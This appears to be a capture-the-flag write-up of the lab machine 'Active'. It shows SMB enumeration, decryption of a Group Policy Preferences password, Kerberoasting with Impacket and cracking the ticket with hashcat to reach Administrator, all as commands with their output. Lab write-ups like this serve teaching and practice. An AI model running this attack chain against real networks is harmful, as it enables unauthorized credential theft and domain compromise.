Pretty short box making use of SMB and Kerberoasting.
Mandatory nmap scan:
sudo nmap -sC -sV 10.129.5.63 Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-29 12:53 EDT Nmap scan report for 10.129.5.63 Host is up (0.0076s latency). Not shown: 983 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-29 16:53:45Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC
The machine is hosting the usual services a Domain Controller would on a fairly old Windows. First thing that came to mind was scanning for SMB shares:
smbmap -H 10.129.5.63 ... [+] IP: 10.129.5.63:445 Name: 10.129.5.63 Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON NO ACCESS Logon server share Replication READ ONLY SYSVOL NO ACCESS Logon server share Users NO ACCESS
We get anonymous access to Replication:
smbclient //10.129.5.63/Replication -N Anonymous login successful Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 active.htb D 0 Sat Jul 21 06:37:44 2018
Inside of active.htb, there are 3 files:
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018 Policies D 0 Sat Jul 21 06:37:44 2018 scripts D 0 Wed Jul 18 14:48:57 2018
DfsrPrivate does not have anything useful inside of it - Policies on the other hand contains a plethora of folders and files - one of which deep within piqued my interest...
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
Inside are two key fields inside of the /xml file: userName="active.htb\SVC_TGS", and cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" - the latter being an encrypted password. However, the AES key for Group Policy Preference Passwords has been published, and with that it can be decrypted:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ GPPstillStandingStrong2k18
We now have a username and password! Running smbshare with our found credentials gives us access to 3 more folders:
smbmap -H 10.129.5.63 -u SVC_TGS -p GPPstillStandingStrong2k18 ... [+] IP: 10.129.5.63:445 Name: 10.129.5.63 Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON READ ONLY Logon server share Replication READ ONLY SYSVOL READ ONLY Logon server share Users READ ONLY
smbclient //10.129.5.63/Users -U SVC_TGS Password for [WORKGROUP\SVC_TGS]: Try "help" to get a list of possible commands. smb: \>
Given how old the OS on this machine is, I'll go with the assumption that it's subject to Kerberoasting. To test the waters, I'll use Impacket's script:
GetUserSPNs.py -dc-ip 10.129.5.63 -request active.htb/SVC_TGS Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2026-05-29 12:51:16.431344
I'm also given a *very* long hash, which I try to crack with hashcat:
hashcat -m 13100 -a 0 ticket /usr/share/wordlists/rockyou.txt --force hashcat (v6.2.6) starting ... :Ticketmaster1968
$krb5tgs$23$*Administrator$ACTIVE.HTB$... - the $krb5tgs$23$ part tells us it's encrypted in RC4, for which there's a designated mode in hashcat.Once we get the password, we can check with smbmap what folders we have permission to now:
smbmap -H 10.129.5.63 -u Administrator -p Ticketmaster1968
...
[+] IP: 10.129.5.63:445 Name: 10.129.5.63 Status: ADMIN!!!
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY
All that's left to do is get root.txt! Very good box if you want to learn about SMB enumeration, good luck to anyone else attempting this box!